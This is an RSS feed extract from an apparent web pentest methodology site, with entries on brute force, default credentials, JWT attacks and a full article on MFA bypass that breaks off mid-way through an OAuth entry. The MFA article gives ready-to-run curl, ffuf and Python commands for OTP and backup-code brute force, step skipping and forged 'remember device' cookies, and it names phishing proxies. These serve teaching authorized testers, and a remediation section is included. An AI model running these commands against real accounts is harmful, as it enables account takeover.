Authentication on MrAzoth https://az0th.it/web/auth/ Recent content in Authentication on MrAzoth Hugo -- 0.154.5 en-us Tue, 24 Feb 2026 00:00:00 +0000 Brute Force & Credential Stuffing https://az0th.it/web/auth/030-auth-brute-force/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/030-auth-brute-force/ <h1 id="brute-force--credential-stuffing">Brute Force &amp; Credential Stuffing</h1> <blockquote> <p><strong>Severity</strong>: High | <strong>CWE</strong>: CWE-307, CWE-521 <strong>OWASP</strong>: A07:2021 – Identification and Authentication Failures</p> </blockquote> <hr> <h2 id="what-is-the-attack-class">What Is the Attack Class?</h2> <p><strong>Credential stuffing</strong>: automated use of username/password pairs from previous data breaches against a target application — relies on password reuse.</p> <p><strong>Brute force</strong>: systematic testing of all possible passwords or a targeted wordlist against a known username.</p> <p><strong>Password spraying</strong>: test one or a few common passwords across many accounts — avoids per-account lockout while still achieving high success rates against weak password policies.</p> Default Credentials https://az0th.it/web/auth/033-auth-default-creds/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/033-auth-default-creds/ <h1 id="default-credentials">Default Credentials</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-1392, CWE-521 <strong>OWASP</strong>: A07:2021 – Identification and Authentication Failures</p> </blockquote> <hr> <h2 id="what-is-the-attack">What Is the Attack?</h2> <p>Default credential attacks target systems where the vendor-supplied default username/password was never changed. This encompasses network devices, databases, application frameworks, content management systems, IoT devices, and cloud management consoles. Despite being one of the oldest attacks, it remains one of the most consistently successful — particularly against internal network services discovered through prior access, and against externally-facing admin interfaces.</p> JWT Attacks https://az0th.it/web/auth/034-auth-jwt/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/034-auth-jwt/ <h1 id="jwt-attacks">JWT Attacks</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-347 <strong>OWASP</strong>: A02:2021 – Cryptographic Failures</p> </blockquote> <hr> <h2 id="what-is-a-jwt">What Is a JWT?</h2> <p>A JSON Web Token consists of three base64url-encoded parts separated by dots:</p> <pre tabindex="0"><code>HEADER.PAYLOAD.SIGNATURE eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 ← header: {&#34;alg&#34;:&#34;HS256&#34;,&#34;typ&#34;:&#34;JWT&#34;} .eyJzdWIiOiJ1c2VyMTIzIiwicm9sZSI6InVzZXIifQ ← payload: {&#34;sub&#34;:&#34;user123&#34;,&#34;role&#34;:&#34;user&#34;} .SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c ← HMAC-SHA256 signature </code></pre><p>The server trusts the payload <strong>only if the signature is valid</strong>. Every attack targets the signature verification step.</p> <hr> <h2 id="attack-surface">Attack Surface</h2> <pre tabindex="0"><code># Where JWTs appear: Authorization: Bearer eyJ... Cookie: token=eyJ... Cookie: session=eyJ... X-Auth-Token: eyJ... POST body: {&#34;token&#34;: &#34;eyJ...&#34;} URL parameter: ?jwt=eyJ... # Identify JWT: - Three base64url segments separated by dots - Starts with eyJ (base64 of {&#34;al or {&#34;ty) - Can decode header/payload with: base64 -d (pad with = if needed) </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <ul> <li><input disabled="" type="checkbox"> Find all JWT tokens in requests/responses</li> <li><input disabled="" type="checkbox"> Decode header: <code>echo &quot;eyJhbGciOiJIUzI1NiJ9&quot; | base64 -d</code></li> <li><input disabled="" type="checkbox"> Note <code>alg</code> field — is it <code>HS256</code>, <code>RS256</code>, <code>none</code>, <code>ES256</code>?</li> <li><input disabled="" type="checkbox"> Test <code>alg: none</code> bypass</li> <li><input disabled="" type="checkbox"> Test algorithm confusion: RS256 → HS256 with public key as secret</li> <li><input disabled="" type="checkbox"> Test weak secret brute-force</li> <li><input disabled="" type="checkbox"> Test <code>kid</code> header injection (SQL, path traversal, SSRF)</li> <li><input disabled="" type="checkbox"> Test <code>jku</code> / <code>x5u</code> header injection (external JWK set)</li> <li><input disabled="" type="checkbox"> Test <code>jwk</code> header embedding</li> <li><input disabled="" type="checkbox"> Modify payload claims (role, admin, sub) — does server validate signature?</li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="attack-1--alg-none-unsigned-token">Attack 1 — <code>alg: none</code> (Unsigned Token)</h3> <p>Some libraries accept tokens with no signature when <code>alg</code> is set to <code>none</code>.</p> MFA Bypass Techniques https://az0th.it/web/auth/039-auth-mfa-bypass/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/039-auth-mfa-bypass/ <h1 id="mfa-bypass-techniques">MFA Bypass Techniques</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-304, CWE-287 <strong>OWASP</strong>: A07:2021 – Identification and Authentication Failures</p> </blockquote> <hr> <h2 id="what-is-mfa-bypass">What Is MFA Bypass?</h2> <p>Multi-Factor Authentication requires something you know + something you have/are. Bypasses exploit: logic flaws in implementation (skipping the MFA step), OTP brute force, session state manipulation, SS7/SIM attacks, phishing-in-real-time, and backup code abuse.</p> <hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <ul> <li><input disabled="" type="checkbox"> Map the full auth flow: login → MFA challenge → success</li> <li><input disabled="" type="checkbox"> Test skipping the MFA step entirely (direct navigate to post-auth page)</li> <li><input disabled="" type="checkbox"> Test replaying the login-only session token before MFA completion</li> <li><input disabled="" type="checkbox"> Test OTP brute force — is there a rate limit per account?</li> <li><input disabled="" type="checkbox"> Test OTP reuse — can same OTP be used twice?</li> <li><input disabled="" type="checkbox"> Test OTP validity window — accepts OTPs from past/future periods?</li> <li><input disabled="" type="checkbox"> Test backup codes — length, entropy, reuse policy</li> <li><input disabled="" type="checkbox"> Test &ldquo;remember this device&rdquo; bypass — forged cookie value</li> <li><input disabled="" type="checkbox"> Test MFA skip via OAuth SSO (if SSO login doesn&rsquo;t require MFA)</li> <li><input disabled="" type="checkbox"> Test API endpoint directly vs web UI (API may skip MFA)</li> <li><input disabled="" type="checkbox"> Test race condition on OTP validation</li> <li><input disabled="" type="checkbox"> Test response manipulation — change <code>mfa_required: true</code> to <code>false</code></li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="attack-1--step-skip--flow-bypass">Attack 1 — Step Skip / Flow Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Login with valid credentials → MFA challenge shown</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Instead of entering OTP, navigate directly to authenticated endpoint:</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Step 1: POST /login → response: {&#34;status&#34;: &#34;mfa_required&#34;, &#34;session&#34;: &#34;PARTIAL_SESSION&#34;}</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Step 2: Instead of GET /mfa-verify, try:</span> </span></span><span style="display:flex;"><span>curl -s https://target.com/dashboard <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -b <span style="color:#e6db74">&#34;session=PARTIAL_SESSION&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Or: after /login, check if full session cookie is already set:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If Set-Cookie: auth_session=... is in /login response → already authenticated?</span> </span></span><span style="display:flex;"><span>curl -s -c cookies.txt -X POST https://target.com/login <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#34;username=victim&amp;password=password&#34;</span> </span></span><span style="display:flex;"><span>cat cookies.txt </span></span><span style="display:flex;"><span><span style="color:#75715e"># Use the session cookie directly:</span> </span></span><span style="display:flex;"><span>curl -s https://target.com/account/profile -b <span style="color:#e6db74">&#34;auth_session=VALUE&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test skipping via direct URL:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># /mfa-challenge?redirect=/admin → skip to /admin</span> </span></span><span style="display:flex;"><span>curl -s <span style="color:#e6db74">&#34;https://target.com/mfa-challenge?redirect=/admin&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -b <span style="color:#e6db74">&#34;partial_session=VALUE&#34;</span> </span></span></code></pre></div><h3 id="attack-2--otp-brute-force">Attack 2 — OTP Brute Force</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e"># TOTP is 6 digits = 1,000,000 combinations</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># But window is usually 30s → only 3 valid codes at a time</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Rate limiting is the critical defense</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Burp Intruder payload: 000000 to 999999</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Or generate wordlist:</span> </span></span><span style="display:flex;"><span>python3 <span style="color:#f92672">-</span>c <span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1000000</span>): </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;</span><span style="color:#e6db74">{</span>i<span style="color:#e6db74">:</span><span style="color:#e6db74">06d</span><span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;</span>) </span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34; &gt; otp_wordlist.txt</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># ffuf:</span> </span></span><span style="display:flex;"><span>ffuf <span style="color:#f92672">-</span>u https:<span style="color:#f92672">//</span>target<span style="color:#f92672">.</span>com<span style="color:#f92672">/</span>verify<span style="color:#f92672">-</span>otp <span style="color:#f92672">-</span>X POST \ </span></span><span style="display:flex;"><span> <span style="color:#f92672">-</span>d <span style="color:#e6db74">&#34;otp=FUZZ&#34;</span> \ </span></span><span style="display:flex;"><span> <span style="color:#f92672">-</span>H <span style="color:#e6db74">&#34;Content-Type: application/x-www-form-urlencoded&#34;</span> \ </span></span><span style="display:flex;"><span> <span style="color:#f92672">-</span>b <span style="color:#e6db74">&#34;session=PARTIAL_SESSION&#34;</span> \ </span></span><span style="display:flex;"><span> <span style="color:#f92672">-</span>w otp_wordlist<span style="color:#f92672">.</span>txt \ </span></span><span style="display:flex;"><span> <span style="color:#f92672">-</span>mc <span style="color:#ae81ff">302</span>,<span style="color:#ae81ff">200</span> <span style="color:#f92672">-</span>fr <span style="color:#e6db74">&#34;Invalid OTP&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Race condition burst (all within 30s window):</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> threading<span style="color:#f92672">,</span> requests </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">try_otp</span>(code): </span></span><span style="display:flex;"><span> r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>post(<span style="color:#e6db74">&#34;https://target.com/verify-otp&#34;</span>, </span></span><span style="display:flex;"><span> data<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#34;otp&#34;</span>: str(code)<span style="color:#f92672">.</span>zfill(<span style="color:#ae81ff">6</span>)}, </span></span><span style="display:flex;"><span> cookies<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#34;session&#34;</span>: <span style="color:#e6db74">&#34;PARTIAL_SESSION&#34;</span>}, </span></span><span style="display:flex;"><span> allow_redirects<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> r<span style="color:#f92672">.</span>status_code <span style="color:#f92672">!=</span> <span style="color:#ae81ff">200</span> <span style="color:#f92672">or</span> <span style="color:#e6db74">&#34;Invalid&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> r<span style="color:#f92672">.</span>text: </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;[HIT] </span><span style="color:#e6db74">{</span>code<span style="color:#e6db74">}</span><span style="color:#e6db74">: </span><span style="color:#e6db74">{</span>r<span style="color:#f92672">.</span>status_code<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>threads <span style="color:#f92672">=</span> [threading<span style="color:#f92672">.</span>Thread(target<span style="color:#f92672">=</span>try_otp, args<span style="color:#f92672">=</span>(i,)) <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1000000</span>)] </span></span><span style="display:flex;"><span><span style="color:#75715e"># Not practical, but for short-range: narrow window with timing</span> </span></span></code></pre></div><h3 id="attack-3--response-manipulation">Attack 3 — Response Manipulation</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Intercept MFA verification response:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Original failure response:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;success&#34;</span>: false, <span style="color:#e6db74">&#34;mfa_verified&#34;</span>: false, <span style="color:#e6db74">&#34;message&#34;</span>: <span style="color:#e6db74">&#34;Invalid OTP&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Modified:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;success&#34;</span>: true, <span style="color:#e6db74">&#34;mfa_verified&#34;</span>: true, <span style="color:#e6db74">&#34;message&#34;</span>: <span style="color:#e6db74">&#34;OTP verified&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Redirect-based bypass:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Original: 302 to /mfa-challenge (OTP failed)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Change to: 302 to /dashboard</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Boolean field manipulation:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If response contains: {&#34;require_mfa&#34;: true}</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Intercept and change: {&#34;require_mfa&#34;: false}</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Then resend — if client-side logic processes this value</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Status code manipulation:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 401 Unauthorized → 200 OK (some client-side apps trust status code)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Change HTTP/1.1 401 to HTTP/1.1 200</span> </span></span></code></pre></div><h3 id="attack-4--otp-reuse-and-extended-window">Attack 4 — OTP Reuse and Extended Window</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Test OTP reuse:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 1. Get valid OTP from authenticator app</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 2. Use it once (success)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 3. Immediately try to use same OTP again</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># → Should fail; if it succeeds → OTP not invalidated after use</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test extended time window:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Standard TOTP window: ±1 period (90s total)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test with: current OTP from 10 minutes ago</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># → If app accepts → overly large window</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test OTP from previous session:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># User A gets OTP, doesn&#39;t use it</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># User B&#39;s account gets OTP submitted with User A&#39;s (stolen) OTP</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># (Bypasses if OTPs aren&#39;t account-bound)</span> </span></span></code></pre></div><h3 id="attack-5--backup-code-enumeration">Attack 5 — Backup Code Enumeration</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Backup codes are typically 8-10 numeric digits</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test brute force if no rate limit:</span> </span></span><span style="display:flex;"><span>ffuf -u https://target.com/backup-code-verify -X POST <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#34;code=FUZZ&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/x-www-form-urlencoded&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -b <span style="color:#e6db74">&#34;session=PARTIAL_SESSION&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -w &lt;<span style="color:#f92672">(</span>python3 -c <span style="color:#e6db74">&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">for i in range(100000000): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> print(f&#39;{i:08d}&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;</span><span style="color:#f92672">)</span> -mc 302,200 -fr <span style="color:#e6db74">&#34;Invalid&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Backup code format patterns:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># XXXX-XXXX (8 hex groups)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 123456789 (9 digits)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># abc12def (alphanumeric 8 chars)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test: if backup code only validated on front-end (JavaScript):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Disable JS, submit any code → does server still validate?</span> </span></span></code></pre></div><h3 id="attack-6--remember-device-bypass">Attack 6 — &ldquo;Remember Device&rdquo; Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># If &#34;remember this device for 30 days&#34; stores a cookie:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test: forge a plausible &#34;remember_device&#34; token</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Common formats:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># base64(user_id + &#34;|&#34; + device_id)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># HMAC-SHA256 signed token (check for weak secret)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Simple UUID or random string</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Extract legitimate &#34;remember&#34; cookie:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Set-Cookie: remembered_device=BASE64_VALUE</span> </span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;BASE64_VALUE&#34;</span> | base64 -d </span></span><span style="display:flex;"><span><span style="color:#75715e"># → user_id:12345:device:abc123:exp:1735000000</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Forge for admin:</span> </span></span><span style="display:flex;"><span>echo -n <span style="color:#e6db74">&#34;user_id:1:device:abc123:exp:9999999999&#34;</span> | base64 </span></span><span style="display:flex;"><span><span style="color:#75715e"># Set cookie with forged value:</span> </span></span><span style="display:flex;"><span>curl -s https://target.com/login <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#34;username=admin&amp;password=KNOWN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -b <span style="color:#e6db74">&#34;remembered_device=FORGED_VALUE&#34;</span> </span></span></code></pre></div><h3 id="attack-7--sim-swap--ss7-sms-based-otp">Attack 7 — SIM Swap / SS7 (SMS-based OTP)</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Conceptual — not a web test, but relevant context:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># SMS OTP attacks:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 1. SIM swap: social engineer carrier → receive victim&#39;s SMS</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 2. SS7 attack: intercept SMS at telecom level</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 3. SIM clone (physical access)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 4. OTP phishing: real-time AITM proxy (Evilginx, Modlishka)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Real-time phishing proxy (Evilginx):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Sets up a reverse proxy that sits between victim and target</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Victim authenticates (including MFA) → proxy captures session cookie</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># No need to bypass MFA technically — proxy passes it through and steals the session</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test: is SMS OTP the only MFA option? Can attacker downgrade to SMS from TOTP?</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Try: change MFA method from TOTP to SMS in account settings</span> </span></span></code></pre></div><h3 id="attack-8--api-mfa-bypass">Attack 8 — API MFA Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Web UI enforces MFA but API endpoints may not:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test direct API access after password-only auth:</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Web login: POST /login → redirects to /mfa-verify</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># API login: POST /api/v1/auth/login → returns token directly?</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/api/v1/auth/login <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;username&#34;: &#34;admin&#34;, &#34;password&#34;: &#34;password&#34;}&#39;</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># → If returns {&#34;token&#34;: &#34;...&#34;} without MFA → API bypass</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Mobile API may have separate endpoint:</span> </span></span><span style="display:flex;"><span>POST /mobile/v2/auth/login <span style="color:#75715e"># different than web</span> </span></span><span style="display:flex;"><span>POST /app/login <span style="color:#75715e"># mobile-specific</span> </span></span></code></pre></div><hr> <h2 id="tools">Tools</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Burp Suite:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Proxy: intercept MFA response → Repeater for manipulation</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Intruder: OTP brute force with 000000-999999 payload</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Turbo Intruder: race condition on OTP validation</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># pyotp — generate valid TOTP codes (if secret is known/leaked):</span> </span></span><span style="display:flex;"><span>pip3 install pyotp </span></span><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#34;import pyotp; print(pyotp.TOTP(&#39;SECRET_BASE32&#39;).now())&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test rate limiting — expect lockout after N attempts:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> i in <span style="color:#66d9ef">$(</span>seq <span style="color:#ae81ff">1</span> 20<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> curl -s -X POST https://target.com/verify-otp <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#34;otp=</span><span style="color:#66d9ef">$(</span>printf <span style="color:#e6db74">&#39;%06d&#39;</span> $i<span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -b <span style="color:#e6db74">&#34;session=PARTIAL_SESSION&#34;</span> | head -1 </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Evilginx (adversary-in-the-middle phishing framework):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># github.com/kgretzky/evilginx2</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># For authorized phishing simulations only</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Monitor MFA response timing:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Time-based oracle: correct OTP may take longer (DB lookup) vs wrong OTP</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> otp in <span style="color:#ae81ff">000000</span> <span style="color:#ae81ff">000001</span> 123456; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> time curl -s -X POST https://target.com/verify-otp <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#34;otp=</span>$otp<span style="color:#e6db74">&#34;</span> -b <span style="color:#e6db74">&#34;session=VAL&#34;</span> &gt; /dev/null </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span></code></pre></div><hr> <h2 id="remediation-reference">Remediation Reference</h2> <ul> <li><strong>Enforce MFA check server-side on every protected endpoint</strong> — not just at the MFA step</li> <li><strong>Invalidate partial-auth session tokens</strong> if MFA not completed within time limit</li> <li><strong>Rate-limit OTP attempts</strong>: max 5–10 per 15 minutes, account lockout after threshold</li> <li><strong>Single-use OTPs</strong>: immediately invalidate after first successful use</li> <li><strong>Narrow TOTP window</strong>: ±1 period (30s drift) is sufficient; never more than ±2</li> <li><strong>Account-bind OTPs</strong>: TOTP codes must be verified against the specific user&rsquo;s secret</li> <li><strong>Phishing-resistant MFA</strong>: prefer hardware keys (WebAuthn/FIDO2) over TOTP or SMS</li> <li><strong>Remove SMS as fallback</strong> if TOTP/WebAuthn is available — SMS is the weakest link</li> </ul> <p><em>Part of the Web Application Penetration Testing Methodology series.</em></p> OAuth 2.0 Misconfigurations https://az0th.it/web/auth/035-auth-oauth/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/035-auth-oauth/ <h1 id="oauth-20-misconfigurations">OAuth 2.0 Misconfigurations</h1> <blockquote> <p><strong>Severity</strong>: Critical | <strong>CWE</strong>: CWE-601, CWE-346, CWE-287 <strong>OWASP</strong>: A07:2021 – Identification and Authentication Failures</p> </blockquote> <hr> <h2 id="what-is-oauth-20">What Is OAuth 2.0?</h2> <p>OAuth 2.0 is an authorization framework that lets third-party applications access resources on behalf of a user without exposing credentials. Key flows:</p> <pre tabindex="0"><code>Authorization Code Flow (most common, most secure): 1. App redirects user → Authorization Server with client_id, redirect_uri, scope, state 2. User authenticates → AS redirects back with ?code=AUTH_CODE&amp;state=... 3. App exchanges code for access_token (server-to-server, with client_secret) 4. App uses access_token to query Resource Server Implicit Flow (legacy, token in URL fragment — mostly deprecated): → Access token delivered directly in redirect URL Client Credentials (machine-to-machine, no user): → client_id + client_secret → access_token Resource Owner Password (deprecated, legacy): → username + password directly to token endpoint </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <ul> <li><input disabled="" type="checkbox"> Find authorization endpoint: <code>/oauth/authorize</code>, <code>/authorize</code>, <code>/auth</code>, <code>/.well-known/openid-configuration</code></li> <li><input disabled="" type="checkbox"> Find token endpoint: <code>/oauth/token</code>, <code>/token</code></li> <li><input disabled="" type="checkbox"> Check <code>redirect_uri</code> validation — wildcard, partial match, path bypass</li> <li><input disabled="" type="checkbox"> Check <code>state</code> parameter — missing, static, predictable</li> <li><input disabled="" type="checkbox"> Test PKCE bypass (Authorization Code with PKCE)</li> <li><input disabled="" type="checkbox"> Test <code>response_type</code> manipulation (code→token, 